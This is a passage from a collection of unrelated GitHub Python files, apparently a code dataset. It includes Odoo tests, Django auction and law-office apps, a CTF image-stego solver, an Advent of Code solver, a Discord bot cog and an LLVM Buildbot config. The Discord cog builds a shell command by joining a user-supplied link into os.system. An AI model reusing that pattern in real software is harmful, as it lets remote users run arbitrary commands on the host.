firo_cli.stop_firo_core()\n","repo_name":"ramdjaram/firo-cli-wrapper","sub_path":"rpc/firocli.py","file_name":"firocli.py","file_ext":"py","file_size_in_byte":6725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23560680552","text":"from odoo.exceptions import ValidationError\nfrom odoo.tests.common import SavepointCase\n\n\nclass TestVatUnique(SavepointCase):\n @classmethod\n def setUpClass(cls):\n super(TestVatUnique, cls).setUpClass()\n cls.partner = cls.env['res.partner'].create({\n 'name': 'Test partner',\n 'vat': 'RO30834857',\n 'nrc': 'J35/2622/2012'\n })\n\n def test_duplicated_vat_creation(self):\n \"\"\" Test creation of partner.\"\"\"\n with self.assertRaises(ValidationError):\n self.env['res.partner'].create({\n 'name': 'Second partner',\n 'vat': 'RO30834857',\n 'nrc': 'J35/2622/2012'\n })\n\n def test_contact_vat_creation(self):\n \"\"\" Test creation of partner contacs.\"\"\"\n self.env['res.partner'].create({\n 'name': 'Test partner 1 - child',\n 'parent_id': self.partner.id,\n 'is_company': False,\n 'vat': 'RO30834857',\n 'nrc': 'J35/2622/2012'\n })\n","repo_name":"decodio/oca11","sub_path":"l10n_ro_partner_unique/tests/test_vat_nrc_unique.py","file_name":"test_vat_nrc_unique.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} 
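A minimal, self-contained sketch of the dynamic method-dispatch pattern used in the FiroCli record above: a whitelist of call names is turned into methods at attribute-lookup time, and each method shells out with subprocess and JSON-decodes the output when possible, the same check-then-json.loads idea as that record's _firo_cli(). The class name CliWrapper and the echo-based demo are illustrative assumptions, not part of the record.

import json
import subprocess


class CliWrapper:
    """Expose a whitelist of CLI subcommands as Python methods."""

    def __init__(self, exe, calls):
        self._exe = exe
        self._calls = set(calls)

    def __getattr__(self, name):
        # Only whitelisted calls become methods; anything else stays a
        # normal AttributeError, so typos fail loudly.
        if name not in self._calls:
            raise AttributeError(name)

        def method(*args):
            # Build `exe subcommand arg...` and capture stdout.
            cmd = [self._exe, name, *map(str, args)]
            out = subprocess.run(cmd, stdout=subprocess.PIPE, check=True).stdout.decode()
            try:
                return json.loads(out)  # structured output (dicts, lists, numbers)
            except json.JSONDecodeError:
                return out.strip()      # plain-text output

        return method


if __name__ == "__main__":
    # Demo against a harmless executable so the sketch runs anywhere with echo:
    cli = CliWrapper("echo", {"getblockcount"})
    print(cli.getblockcount(42))  # prints: getblockcount 42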
+{"seq_id":"27192688955","text":"from django.contrib.auth.models import AbstractUser\nfrom django.core.validators import MinValueValidator\nfrom django.db import models\nfrom django.core.exceptions import ValidationError\nfrom django.utils import timezone\n\n\nclass User(AbstractUser):\n watchlist = models.ManyToManyField(\n \"auctions.Auction\", related_name=\"watched_auctions\", blank=True\n )\n pass\n\n\nclass Auction(models.Model):\n CATEGORIES = (\n (\"No Category\", \"No Category\"),\n (\"Electronics\", \"Electronics\"),\n (\"Clothing\", \"Clothing\"),\n (\"Home & Garden\", \"Home & Garden\"),\n (\"Toys & Hobbies\", \"Toys & Hobbies\"),\n (\"Automotive\", \"Automotive\"),\n )\n\n name = models.CharField(max_length=255)\n description = models.TextField()\n start_time = models.DateTimeField()\n end_time = models.DateTimeField()\n owner = models.ForeignKey(\n User, on_delete=models.CASCADE, related_name=\"owned_auctions\"\n )\n winner = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n null=True,\n blank=True,\n related_name=\"won_auctions\",\n )\n starting_bid = models.DecimalField(\n max_digits=10, decimal_places=2, validators=[MinValueValidator(0)]\n )\n current_bid = models.DecimalField(\n max_digits=10, decimal_places=2, null=True, blank=True\n )\n image_url = models.URLField(max_length=200, null=True, blank=True)\n category = models.CharField(\n max_length=50, choices=CATEGORIES, default=\"No Category\"\n )\n\n watchers = models.ManyToManyField(\n User, through=\"WatchList\", related_name=\"watchlist_auctions\"\n )\n\n def __str__(self):\n return self.name\n\n def update_current_bid(self, bid_amount):\n if bid_amount >= self.starting_bid:\n self.current_bid = bid_amount\n else:\n self.current_bid = self.starting_bid\n self.save()\n\n def close(self):\n if self.current_bid is not None:\n self.winner = Bid.objects.get(auction=self, amount=self.current_bid).bidder\n self.end_time = timezone.now()\n self.save()\n\n\nclass Bid(models.Model):\n auction = models.ForeignKey(Auction, on_delete=models.CASCADE)\n bidder = models.ForeignKey(User, on_delete=models.CASCADE)\n amount = models.DecimalField(max_digits=10, decimal_places=2)\n\n def __str__(self):\n return f\"{self.bidder} bid {self.amount} on {self.auction}\"\n\n def clean(self):\n if self.bidder == self.auction.owner:\n raise ValidationError(\"Owner cannot bid on their own auction.\")\n if (\n self.auction.current_bid is not None\n and self.amount <= self.auction.current_bid\n ):\n raise ValidationError(\"Bid must be higher than the current bid.\")\n elif not self.auction.current_bid and self.amount < self.auction.starting_bid:\n raise ValidationError(\n \"Bid amount must be greater than or equal to the starting bid.\"\n )\n super().clean()\n\n def save(self, *args, **kwargs):\n self.auction.update_current_bid(self.amount)\n super().save(*args, **kwargs)\n\n\nclass Comment(models.Model):\n auction = models.ForeignKey(Auction, on_delete=models.CASCADE)\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n text = models.TextField()\n\n def __str__(self):\n return f\"{self.user} commented on {self.auction}\"\n\n\nclass WatchList(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, related_name=\"watchlists\")\n auction = models.ForeignKey(Auction, on_delete=models.CASCADE)\n date_added = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n unique_together = (\"user\", \"auction\")\n\n def __str__(self) -> str:\n return f\"{self.user} is listing 
{self.auction}\"\n","repo_name":"KameiKento/cs50w-auction-site","sub_path":"auctions/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39361202704","text":"from PIL import Image\r\nimport cmath, math, random, string\r\nimport numpy\r\nfrom scipy.linalg import solve\r\n\r\ntext = 'DDCTF{}'\r\nenc = Image.open('encrypted.bmp')\r\n\r\nmaxLen = 45\r\nimg_size = 800\r\nabs_cor_size = 1.05\r\nmaxValue = 2200.0\r\n\r\n\r\ndef linear_map(v, old_dbound, old_ubound, new_dbound, new_ubound):\r\n return (v - old_dbound) * 1.0 / (old_ubound - old_dbound) * (new_ubound - new_dbound) + new_dbound\r\n\r\n\r\ndef unlinear_map(res, old_dbound, old_ubound, new_dbound, new_ubound):\r\n return (res - new_dbound) * 1.0 / (new_ubound - new_dbound) * (old_ubound - old_dbound) + old_dbound\r\n\r\n\r\ndef unmapping(x, y):\r\n return complex(linear_map(x, 0, img_size, -abs_cor_size, abs_cor_size),\r\n linear_map(y, 0, img_size, abs_cor_size, -abs_cor_size))\r\n\r\n\r\nres = []\r\nz = []\r\ncol = 0\r\nfor row in range(800):\r\n G = enc.getpixel((col, row))[1]\r\n B = enc.getpixel((col, row))[2]\r\n\r\n v_r = unlinear_map(G, -maxValue, maxValue, 0, 255)\r\n if int(round(linear_map(v_r, -maxValue, maxValue, 0, 255))) != G:\r\n # v_r = unlinear_map(G - 1, -maxValue, maxValue, 0, 255)\r\n break\r\n v_i = unlinear_map(B, -maxValue, maxValue, 0, 255)\r\n if int(round(linear_map(v_i, -maxValue, maxValue, 0, 255))) != B:\r\n # v_i = unlinear_map(B - 1, -maxValue, maxValue, 0, 255)\r\n break\r\n if complex(v_r, v_i) not in res:\r\n res.append(complex(v_r, v_i))\r\n z.append(unmapping(col, row))\r\n if len(res) == 44:\r\n break\r\n# print(res)\r\n# print(len(res))\r\n# print(z)\r\n\r\np = []\r\nfor x in z:\r\n tmp = []\r\n t_p = 1 + 0j\r\n for i in range(44):\r\n tmp.append(t_p)\r\n t_p = t_p / x\r\n p.append(tmp)\r\nprint(p)\r\n\r\na = numpy.array(p)\r\nb = numpy.array(z)\r\n# x = solve(a, b)\r\n# print(x)\r\n\r\n\r\n\r\n\r\n","repo_name":"Rai4over/CTFS","sub_path":"DDCTF2018/complex stego/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43230189201","text":"from matplotlib.animation import FuncAnimation\r\nfrom matplotlib import cm\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport cv2\r\nfrom get_fps import FrameRate\r\n\r\n\r\nclass Animation:\r\n def __init__(self):\r\n self.fig, self.ax = plt.subplots()\r\n self.x, self.y = np.meshgrid(np.arange(0, 640, 1), np.arange(0, 480, 1))\r\n\r\n self.cap = cv2.VideoCapture(0)\r\n ret, frame = self.cap.read()\r\n if ret:\r\n self.im = self.ax.imshow(frame[:, :, 0], cmap=cm.hot)\r\n\r\n self.frame_rate = FrameRate()\r\n cv2.namedWindow('src', cv2.WINDOW_NORMAL)\r\n\r\n def __del__(self):\r\n self.cap.release()\r\n cv2.destroyAllWindows()\r\n\r\n def update(self, index):\r\n ret, frame = self.cap.read()\r\n key = cv2.waitKey(1)\r\n\r\n if ret:\r\n self.im.set_data(frame[:, :, 0])\r\n cv2.putText(frame, str(self.frame_rate.get()), (30, 30), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255, 255, 255), 2, cv2.LINE_AA)\r\n cv2.imshow('src', frame)\r\n\r\n if key == ord('q'):\r\n self.__del__()\r\n\r\n\r\nif __name__ == '__main__':\r\n animation = Animation()\r\n ani = FuncAnimation(animation.fig, animation.update, interval=50, blit=False)\r\n 
plt.show()\r\n\r\n\r\n","repo_name":"yoguri00/beam_monitor","sub_path":"beam_monitor_animation.py","file_name":"beam_monitor_animation.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6784135085","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nObliczanie pola powierzchni trójkąta którego długości boków są znane.\n\nDo obliczenia pola powierzchni trójkąta gdy znane są długości boków używamy\nwzoru Herona, patrz https://pl.wikipedia.org/wiki/Wzór_Herona (10.10.2020).\n\nCC-BY-NC-ND 2020 Sławomir Marczyński\n\"\"\"\n\nfrom math import sqrt\n\n\ndef area(a, b, c):\n \"\"\"\n Obliczanie powierzchni trójkąta za pomocą wzoru Herona.\n\n Dane:\n a, b, c - długości boków trójkąta.\n Wynik:\n pole powierzchni trójkąta.\n Wyjątki:\n jeżeli trójkąt o podanych długościach boków nie istnieje i są\n sprawdzane asercje, to zgłaszany jest wyjątek AssertionError.\n \"\"\"\n\n # UWAGA: assert jest gorszym rozwiązaniem niż sprawdzanie instrukcją if\n # wyjątku ValueError. Assert może nie zadziałać - bo jest możliwość\n # wyłączania - dla przyspieszenia programu - działania instrukcji Assert.\n # Z drugiej strony jeżeli mamy pewność że dane nie potrzebują sprawdzania\n # to wyłączenie assert może przyspieszyć działanie programu.\n #\n # Instrukcja assert expression jest równoważne takiemu fragmentowi kodu::\n #\n # if __debug__:\n # if not expression: raise AssertionError\n\n assert a > 0 and b > 0 and c > 0\n assert a < b + c and b < a + c and c < a + b\n\n p = (a + b + c) / 2\n s = sqrt(p * (p - a) * (p - b) * (p - c))\n return s\n\n\nDŁUGOŚĆ_BOKU_BC = 4\nDŁUGOŚĆ_BOKU_AC = 5\nDŁUGOŚĆ_BOKU_AB = 6\n\nprint('długość boku BC =', DŁUGOŚĆ_BOKU_BC)\nprint('długość boku AC =', DŁUGOŚĆ_BOKU_AC)\nprint('długość boku AB =', DŁUGOŚĆ_BOKU_AB)\n\npole_powierzchni = area(DŁUGOŚĆ_BOKU_BC, DŁUGOŚĆ_BOKU_AC, DŁUGOŚĆ_BOKU_AB)\n\nprint('pole powierzchni trójkąta =', pole_powierzchni)\n","repo_name":"natiem/python-1","sub_path":"01-flow-control/heron_5.py","file_name":"heron_5.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32883413552","text":"import itertools\nimport sys\n\nmoves = list(sys.stdin.read().strip())\n\nshapes = [\n [\n '@@@@'\n ],\n [\n '.@.',\n '@@@',\n '.@.'\n ],\n [\n '..@',\n '..@',\n '@@@'\n ],\n [\n '@',\n '@',\n '@',\n '@'\n ],\n [\n '@@',\n '@@'\n ]\n]\n\ndef merge(loffset, target, source):\n # First do a check\n for i in range(len(source)):\n if target[loffset + i] != '.':\n return False\n # Then do the merge if we can\n for i in range(len(source)):\n target[loffset + i] = source[i]\n return True\n\ndef rindex(l, find):\n for i in range(len(l) - 1, -1, -1):\n if l[i] == find:\n return i\n raise ValueError(l)\n\ndef rfind(l, find, max_idx = None):\n start = len(l) - 1 if max_idx is None else min(len(l) - 1, max_idx)\n for i in range(start, -1, -1):\n if l[i] == find:\n return i\n return -1\n\ndef lfind(l, find, min_idx = None):\n start = 0 if min_idx is None else min_idx\n for i in range(start, len(l)):\n if l[i] == find:\n return i\n return -1\n\ndef check_move(move, row):\n if move == '>':\n idx = rindex(row, '@')\n return idx < 6 and row[idx + 1] == '.'\n elif move == '<':\n idx = row.index('@')\n return idx > 0 and row[idx - 1] == '.'\n else:\n assert False, move\n\ndef do_move(move, row):\n if move == '>':\n max_idx = 1000\n while True:\n idx = rfind(row, '@', max_idx)\n 
if idx != -1:\n row[idx + 1] = '@'\n else:\n break\n max_idx = idx - 1\n row[max_idx + 1] = '.'\n elif move == '<':\n min_idx = 0\n while True:\n idx = lfind(row, '@', min_idx)\n if idx != -1:\n row[idx - 1] = '@'\n else:\n break\n min_idx = idx + 1\n row[min_idx - 1] = '.'\n else:\n assert False, move\n\ndef check_fall(row_idx, chamber):\n if row_idx == len(chamber) - 1:\n return False\n for i in range(0, 7):\n if chamber[row_idx][i] == '@' and chamber[row_idx + 1][i] == '#':\n return False\n return True\n\ndef do_fall(row_idx, chamber):\n for i in range(0, 7):\n if chamber[row_idx][i] == '@':\n chamber[row_idx + 1][i] = '@'\n chamber[row_idx][i] = '.'\n\ndef solidify(row):\n is_full = True\n for i in range(len(row)):\n if row[i] == '@':\n row[i] = '#'\n if is_full and row[i] != '#':\n is_full = False\n return is_full\n\ndef run_simulation(callback):\n shape_idx = 0\n highest = 0\n chamber = []\n shape_bottom = None\n shape_height = None\n need_shape = True\n stop_count = 0\n\n for move in itertools.cycle(moves):\n\n if need_shape:\n shape = shapes[shape_idx]\n shape_idx = (shape_idx + 1) % len(shapes)\n # 3 units away from highest\n # grow chamber upwards to make space\n while highest < len(shape) + 3:\n chamber.insert(0, list('.' * 7))\n highest += 1\n\n ins = highest - 4\n shape_height = len(shape)\n shape_bottom = ins\n for i in range(len(shape) - 1, -1, -1):\n assert merge(2, chamber[ins], shape[i])\n ins -= 1\n need_shape = False\n\n can_move = True\n for i in range(shape_bottom, shape_bottom - shape_height, -1):\n if not check_move(move, chamber[i]):\n can_move = False\n break\n\n if can_move:\n for i in range(shape_bottom, shape_bottom - shape_height, -1):\n do_move(move, chamber[i])\n\n can_fall = True\n for i in range(shape_bottom, shape_bottom - shape_height, -1):\n if not check_fall(i, chamber):\n can_fall = False\n break\n\n if can_fall:\n for i in range(shape_bottom, shape_bottom - shape_height, -1):\n do_fall(i, chamber)\n shape_bottom += 1\n else:\n for i in range(shape_bottom, shape_bottom - shape_height, -1):\n is_full = solidify(chamber[i])\n stop_count += 1\n need_shape = True\n # highest is the index of the top of the shape, so -1 the height\n shape_top = shape_bottom - (shape_height - 1)\n highest = min(highest, shape_top)\n is_flat = is_full and highest == shape_top\n height = len(chamber) - highest\n if callback(is_flat, stop_count, height, shape_idx):\n break\n\nknown_shape_cycle = None\nseen_shape_flat = set()\ndef discover_shape(is_flat, stop_count, height, shape_idx):\n global known_shape_cycle\n if is_flat:\n if shape_idx in seen_shape_flat:\n known_shape_cycle = shape_idx\n return True\n seen_shape_flat.add(shape_idx)\n return False\n\nrun_simulation(discover_shape)\n\noffset_height = None\noffset_count = None\nprev_height = None\nprev_count = None\nseen_delta = set()\ndef discover_period(is_flat, stop_count, height, shape_idx):\n global offset_height, offset_count, prev_height, prev_count\n if is_flat and shape_idx == known_shape_cycle:\n if offset_height is None:\n offset_height = height\n offset_count = stop_count\n else:\n delta = (height - prev_height, stop_count - prev_count)\n if delta in seen_delta:\n return True\n seen_delta.add(delta)\n prev_height = height\n prev_count = stop_count\n return False\n\nrun_simulation(discover_period)\nperiod_height = sum(d[0] for d in seen_delta)\nperiod_count = sum(d[1] for d in seen_delta)\n\n# Subtract offset, we add it's height back at the end\nnum_stopped = 1000000000000 - offset_count\n# get the number of times 
we repeat the period\n# tail is the remainder offset\nperiod_times, tail = divmod(num_stopped, period_count)\n\n# Measure the height of \"tail\" counts, starting from the offset\nstop_at_count = tail\ntail_height = None\ndef measure_height_at_count_offset(is_flat, stop_count, height, shape_idx):\n    global tail_height\n    if stop_count - offset_count == stop_at_count:\n        tail_height = height - offset_height\n        return True\n    return False\n\nrun_simulation(measure_height_at_count_offset)\n# Trail height is initial offset height + final tail height\ntrail_height = tail_height + offset_height\n\n# Finally, multiply the period height by number of times needed\n# and add the trail height\nprint((period_times * period_height) + trail_height)\n","repo_name":"simon816/Advent-of-Code-2022","sub_path":"17/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":6631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"11875110798","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\nfrom .models import *\nfrom .forms import *\nfrom django.contrib.auth.decorators import login_required\n\n@login_required\ndef listarcasoslibres(request):\n    casos=Expediente.objects.filter(fecha_ingreso__lte=timezone.now(),estado='1').order_by('fecha_ingreso')\n    return render(request, 'buffete/listarcasoslibres.html',{'casos':casos})\n\n@login_required\ndef listarcasosllevados(request):\n    casos=Expediente.objects.filter(estado='2').order_by('fecha_ingreso')\n    return render(request, 'buffete/listarcasosocupados.html',{'casos':casos})\n\n@login_required\ndef listarclientes(request):\n    cliente=Cliente.objects.filter(estado=True).order_by('nombre')\n    return render(request, 'buffete/listarclientes.html',{'clientes':cliente})\n\n@login_required\ndef listarcasosterminados(request):\n    casos=Expediente.objects.filter(estado='3').order_by('fecha_finalizacion')\n    return render(request, 'buffete/listarcasosterminados.html',{'casos':casos})\n\n@login_required\ndef detalle_caso(request,iden):\n    caso = get_object_or_404(Expediente, id=iden)\n    return render(request, 'buffete/detalle_caso.html',{'caso':caso})\n\n@login_required\ndef nuevocaso(request):\n    if request.method == \"POST\":\n        exp = ExpedienteForm(request.POST)\n        if exp.is_valid():\n            expediente = exp.save(commit = False)\n            expediente.author = request.user\n            expediente.save()\n            return redirect('detalle_caso', iden=expediente.id)\n    else:\n        expediente = ExpedienteForm()\n    return render(request, 'buffete/caso_editar.html', {'form':expediente})\n\n@login_required\ndef caso_editar(request, iden):\n    post= get_object_or_404(Expediente, id=iden)\n    if request.method == \"POST\":\n        exp = ExpedienteForm(request.POST, instance=post)\n        if exp.is_valid():\n            expediente = exp.save(commit = False)\n            if exp.cleaned_data['abogado']:\n                expediente.estado=\"2\"\n                expediente.fecha_inicio=timezone.now()\n            else:\n                expediente.estado=\"1\"\n            expediente.author = request.user\n            expediente.save()\n            return redirect('detalle_caso', iden=expediente.id)\n    else:\n        expediente = ExpedienteForm(instance=post)\n    return render(request, 'buffete/caso_editar.html', {'form':expediente})\n\n@login_required\ndef terminar_caso(request,iden):\n    caso=get_object_or_404(Expediente,id=iden)\n    caso.terminar()\n    caso.save()\n    return redirect('detalle_caso',iden=iden)\n\n@login_required\ndef eliminar_cliente(request,id):\n    cliente= get_object_or_404(Cliente, id=id)\n    # a model instance has no .update(); set the field and save instead\n    cliente.estado = False\n    cliente.save()\n    return 
redirect(listarclientes)\n\ndef nuevousuario(request):\n    if request.method == \"POST\":\n        us = UserForm(request.POST)\n        if us.is_valid():\n            usuario = us.save(commit=False)\n            usuario.author = request.user\n            usuario.save()\n            return redirect('usuario_nuevo')\n    else:\n        usuario = UserForm()\n    return render(request, 'buffete/usuario_editar.html',{'form':usuario})\n\ndef abogadonuevo(request):\n    if request.method == \"POST\":\n        abogado = AbogadoForm(request.POST)\n        if abogado.is_valid():\n            abogado = abogado.save(commit=False)\n            abogado.author = request.user\n            abogado.save()\n            return redirect('casoslibres')\n    else:\n        abogado = AbogadoForm()\n    return render(request, 'buffete/abogado_editar.html', {'form':abogado})\n\n\n@login_required\ndef nuevocliente(request):\n    if request.method == \"POST\":\n        cliente = ClienteForm(request.POST)\n        if cliente.is_valid():\n            cliente = cliente.save(commit=False)\n            cliente.author = request.user\n            cliente.save()\n            return redirect('casoslibres')\n    else:\n        cliente = ClienteForm()\n    return render(request, 'buffete/cliente_editar.html', {'form':cliente})\n","repo_name":"Plax96/django-zona","sub_path":"buffete/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"16965833571","text":"from pathlib import Path\n\n\ndef main():\n    project_dir = Path(__file__).parent\n    input_dir = project_dir.joinpath('input')\n    src_dir = project_dir.joinpath('AoC2022')\n    for i in range(1, 26):\n        daily_input = input_dir.joinpath(f'day{i}.txt')\n        daily_src = src_dir.joinpath(f'day{i}.py')\n        if not daily_input.exists():\n            open(daily_input, 'w', encoding='utf-8')\n        if not daily_src.exists():\n            open(daily_src, 'w', encoding='utf-8').write(f\"\"\"from dataloader import get_input_data\n\n\ndef main():\n    data = get_input_data({i})\n\n\nif __name__ == '__main__':\n    main()\n\n\"\"\")\n\nif __name__ == '__main__':\n    main()","repo_name":"thorn-ale/AoC2022","sub_path":"project_setup.py","file_name":"project_setup.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"1366711878","text":"import os\r\nimport discord\r\nfrom discord.ext import commands\r\n\r\nclass mp3(commands.Cog):\r\n\r\n    def __init__(self, client):\r\n        self.client = client\r\n\r\n    @commands.command()\r\n\r\n    ###################################################################################\r\n\r\n    async def mp3(self, ctx, link):\r\n        os.chdir(r\"C:\\\\Users\\\\###\\\\Desktop\\\\youtube-dl\")\r\n\r\n        os.system('youtube-dl --extract-audio --audio-format mp3 ' + link)\r\n\r\n        a = os.listdir(r\"C:\\\\Users\\\\###\\\\Desktop\\\\youtube-dl\")\r\n        latest = max(a, key=os.path.getctime)\r\n\r\n        if latest[-3:] == 'mp3':\r\n            await ctx.channel.send(file=discord.File(r\"C:\\\\Users\\\\###\\\\Desktop\\\\youtube-dl\\\\\\\\\" + latest))\r\n            os.remove(r\"C:\\\\Users\\\\###\\\\Desktop\\\\youtube-dl\\\\\\\\\" + latest)\r\n        else:\r\n            await ctx.channel.send('Pas un mp3')\r\n\r\n    ###################################################################################\r\n\r\ndef setup(client):\r\n    client.add_cog(mp3(client))\r\n","repo_name":"haddad-github/DiscordBot-Public","sub_path":"cogs/mp3.py","file_name":"mp3.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"37203731151","text":"from gui import *\nimport pickle\nfrom os.path 
import join\nfrom startup import out, error\n\nEnglish_home = 'C:\\\\work_space\\\\home\\\\English'\n#common_words is a set of known words\ncommon_words_file = join(English_home, 'data', 'common_words.pckl')\ndef load_common_words():\n    global common_words\n    common_words = pickle.load(open(common_words_file, 'rb'))\n    list_common_words()\n# user_words is a dictionary {eng: heb}\ndef load_user_words():\n    global user_words, user_words_file\n    dict_file = tkFileDialog.askopenfile(\n        mode='rb', initialdir = join(English_home, 'data'))\n    if dict_file:\n        user_words_file = dict_file\n        user_words = pickle.load(dict_file)\n        list_user_words()\n    else: \n        tkMessageBox.showerror(\"User words\", \"Could not open the user word list\")\n\ndef update_common_words(word_list):\n    global common_words\n    common_words = set(w.strip().lower() for w in word_list)\n    store = tkMessageBox.askyesno(\"store\", \"Store the common words?\")\n    if store: pickle.dump(common_words, open(common_words_file, 'wb'))\n\ndef update_user_words(word_dict):\n    global user_words\n    user_words = dict(word_dict)\n    editor.clearAll()\n    out(user_words)\n    store = tkMessageBox.askyesno(\"store\", \"Store the user words?\")\n    # user_words_file is the file object chosen in load_user_words(); reopen it by name for writing\n    if store: pickle.dump(user_words, open(user_words_file.name, 'wb'))\n    \n","repo_name":"ukaluzhny/uutils","sub_path":"npp/english.py","file_name":"english.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"23398608114","text":"import numpy as np\nfrom config import Config as cf\nfrom optimizers import utils\nfrom optimizers.optimizer import Optimizer\nfrom behaviorPolicy.DeepPolicy.PG_policy_Vehicle import PG_policy_car\n\n\nclass DeepPolicy_Vehicle(Optimizer):\n    \"\"\"\n    init delay Vector of (1, 4) = [[0, 0, 0, 0]]\n    this vector is used to train output Vnet\n\n    also, init delay vector of (1, 3) = [[0, 0, 0]]\n    this vector is sent to RSUs, RSUs use this vector\n    to train output Rnet\n    \"\"\"\n    def __init__(self, agent_name=None):\n        super().__init__(agent_name)\n        self.agent_name = agent_name\n        self.delayForCar = np.zeros([1, 4])\n        self.delayForRsu = np.zeros([1, 3])\n        self.policy = PG_policy_car().getPolicy()\n\n    def updateDelayCar(self, newVect):\n        self.delayForCar = (1 - cf.dp_decay) * self.delayForCar + cf.dp_decay * newVect\n\n    def updateDelayRsu(self, newVect):\n        self.delayForRsu = (1 - cf.dp_decay) * self.delayForRsu + cf.dp_decay * newVect\n\n    def getDelayVectCar(self, message):\n        message_id = message.id\n        newVect = [0, 0, 0, 0]\n        delay = message.getTotalDelay()\n        actor = message.getAction()\n        newVect[actor] = delay\n        return message_id, newVect\n\n    def updateReward(self, message, Vnet, Rnet):\n        message_id, newVectCar = self.getDelayVectCar(message=message)\n        self.updateDelayCar(newVect=np.array(newVectCar).reshape([1, 4]))\n        Vnet.updateNet(\n            message_id=message_id,\n            delayVector=utils.Vector_processing.softmax((-1) * self.delayForCar).reshape([1, 4])\n        )\n        # If the message was first sent to a rsu then create a vector\n        isRsuNext, delayFromRsu = message.getRsuAction()\n        if isRsuNext:\n            newVect = [0, 0, 0]\n            # the first element returned by getRsuAction() is the RSU action, either 1 or 2\n            newVect[isRsuNext - 1] = delayFromRsu\n            self.updateDelayRsu(newVect=np.array(newVect).reshape([1, 3]))\n            Rnet.updateNet(\n                message_id=message_id,\n                delayVector=utils.Vector_processing.softmax((-1) * self.delayForRsu).reshape([1, 3])  # delayForRsu has shape (1, 3)\n            )\n\n\n\n\n#\n# delayVector = [0, 0, 0, 0]\n# delay = 0.5\n# processor = 3\n# delayVector[processor] = delay\n# print(np.array(delayVector).reshape([1, 
4]))\n","repo_name":"youc680/Mobile-Edge-Computing-pyt","sub_path":"optimizers/DeepPolicy/DeepPolicy_Vehicle.py","file_name":"DeepPolicy_Vehicle.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"18818140765","text":"import sys\n\nfrom polyjit.buildbot.builders import register\nfrom polyjit.buildbot import slaves\nfrom polyjit.buildbot.utils import (builder, define, git, ucmd, ucompile, cmd,\n upload_file, ip, s_sbranch,\n s_nightly, s_force, s_trigger,\n hash_upload_to_master)\nfrom polyjit.buildbot.repos import make_cb, make_new_cb, codebases\nfrom polyjit.buildbot.master import URL\nfrom buildbot.plugins import util\nfrom buildbot.changes import filter\n\ncodebase = make_cb(['llvm', 'clang', 'polly', 'openmp', 'compiler-rt'])\nforce_codebase = make_new_cb(['llvm', 'clang', 'polly', 'openmp', 'compiler-rt'])\n\nP = util.Property\nBuildFactory = util.BuildFactory\naccepted_builders = slaves.get_hostlist(slaves.infosun)\n\n\n# yapf: disable\ndef configure(c):\n steps = [\n define(\"LLVM_ROOT\", ip(\"%(prop:builddir)s/llvm\")),\n define(\"UCHROOT_SRC_ROOT\", \"/mnt/llvm\"),\n define(\"CLANG_ROOT\", ip(\"%(prop:LLVM_ROOT)s/tools/clang\")),\n define(\"POLLY_ROOT\", ip(\"%(prop:LLVM_ROOT)s/tools/polly\")),\n define(\"COMPILERRT_ROOT\", ip(\"%(prop:LLVM_ROOT)s/projects/compiler-rt\")),\n define(\"OPENMP_ROOT\", ip(\"%(prop:LLVM_ROOT)s/projects/openmp\")),\n\n git('llvm', 'master', codebases, workdir=P(\"LLVM_ROOT\")),\n git('clang', 'master', codebases, workdir=P(\"CLANG_ROOT\")),\n git('polly', 'master', codebases, workdir=P(\"POLLY_ROOT\")),\n git('compiler-rt', 'master', codebases, workdir=P(\"COMPILERRT_ROOT\")),\n git('openmp', 'master', codebases, workdir=P(\"OPENMP_ROOT\")),\n ucmd('cmake', P(\"UCHROOT_SRC_ROOT\"),\n '-DCMAKE_BUILD_TYPE=Release',\n '-DCMAKE_INSTALL_PREFIX=./_install',\n '-DCMAKE_CXX_FLAGS_RELEASE=-O3 -DNDEBUG -DLLVM_ENABLE_STATS',\n '-DBUILD_SHARED_LIBS=Off',\n '-DPOLLY_BUILD_POLLI=Off',\n '-DLLVM_POLLY_LINK_INTO_TOOLS=OFF',\n '-DLLVM_TARGETS_TO_BUILD=X86',\n '-DLLVM_BINUTILS_INCDIR=/usr/include',\n '-DLLVM_ENABLE_PIC=On',\n '-DLLVM_ENABLE_ASSERTIONS=On',\n '-DLLVM_ENABLE_TERMINFO=Off',\n '-DCLANG_DEFAULT_OPENMP_RUNTIME=libomp',\n '-G', 'Ninja',\n env={\n \"PATH\": 